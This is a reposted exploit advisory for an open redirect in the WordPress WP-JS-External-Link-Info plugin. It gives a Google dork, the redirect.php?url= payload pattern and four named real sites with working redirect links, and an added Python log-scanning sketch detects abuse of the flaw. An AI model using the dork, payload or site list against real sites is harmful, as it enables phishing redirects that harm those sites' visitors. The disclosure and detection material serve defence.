WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection

2019.02.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

####################################################################

# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/02/2019
# Vendor Homepage : finewebdev.com
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
# Software Information Link : wordpress.org/plugins/wp-external-links/
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info/''
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : packetstormsecurity.com/files/151679/WordPress-WP-JS-External-Link-Info-2.2.0-Open-Redirection.html

####################################################################

# Description about Software :
***************************
“WP External Links (nofollow new tab seo)” is open source software.

Manage external and internal links on your site.

####################################################################

# Impact :
***********
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
because the application fails to properly verify user-supplied input.

Exploiting this issue may allow attackers to redirect users to arbitrary web sites
and conduct phishing attacks; other attacks are also possible.

WordPress Plugin WP Js External Link Info versions 1.21 - 1.81 and 2.2.0 are vulnerable;
prior versions may also be affected.

####################################################################

# Open Redirection Exploit :
**********************
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov

####################################################################

# Example Vulnerable Sites :
*************************
[+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com

[+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com

[+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/

[+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
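
A detection sketch for the redirect endpoint described above, added here as an example and not part of the original advisory or the plugin's code: it scans web-server access-log lines for requests to redirect.php whose url parameter points at a host outside the site's own. The combined log format, the sample log lines and the own_hosts set are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint path named in the advisory; endswith() also matches a /wp/ prefix.
REDIRECT_PATH = "/wp-content/plugins/wp-js-external-link-info/redirect.php"
# Combined log format (assumed): client IP ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def redirect_target_host(request_target):
    """Return the host the url= parameter points at, or None if not applicable."""
    try:
        parts = urlsplit(request_target)
        if not parts.path.lower().endswith(REDIRECT_PATH):
            return None
        values = parse_qs(parts.query).get("url")
        if not values:
            return None
        # parse_qs decodes once; decode again to catch double-encoded values,
        # and normalise backslashes, which browsers treat like forward slashes.
        target = unquote(values[0]).strip().replace("\\", "/")
        if target.startswith("//"):      # protocol-relative form: //host/path
            target = "http:" + target
        return urlsplit(target).hostname  # None for relative targets
    except ValueError:                    # malformed URL in the log line
        return None

def find_offsite_redirects(log_lines, own_hosts):
    """Return (client_ip, status, host) for hits that redirect off own_hosts."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        host = redirect_target_host(m.group(2)) if m else None
        if host and host not in own:
            hits.append((m.group(1), int(m.group(3)), host))
    return hits

# Constructed sample log lines (documentation IP ranges and example domains).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Feb/2019:10:00:01 +0000] "GET /wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://login.example.net/ HTTP/1.1" 302 0',
    '198.51.100.23 - - [18/Feb/2019:10:00:05 +0000] "GET /wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=%252F%252Fevil.example.org%252Fpay HTTP/1.1" 302 0',
    '192.0.2.10 - - [18/Feb/2019:10:00:09 +0000] "GET /wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://blog.example.com/about HTTP/1.1" 302 0',
    '192.0.2.11 - - [18/Feb/2019:10:00:12 +0000] "GET /index.php?url=https://other.example.org/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(find_offsite_redirects(SAMPLE_LOG, {"blog.example.com"}))
```

Hits with a 3xx status and an off-site host are the ones worth correlating with referrers and mail-gateway logs, since the redirect is typically reached through a link sent to the victim.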

References:

packetstormsecurity.com/files/151679/WordPress-WP-JS-External-Link-Info-2.2.0-Open-Redirection.html



Copyright 2019, cxsecurity.com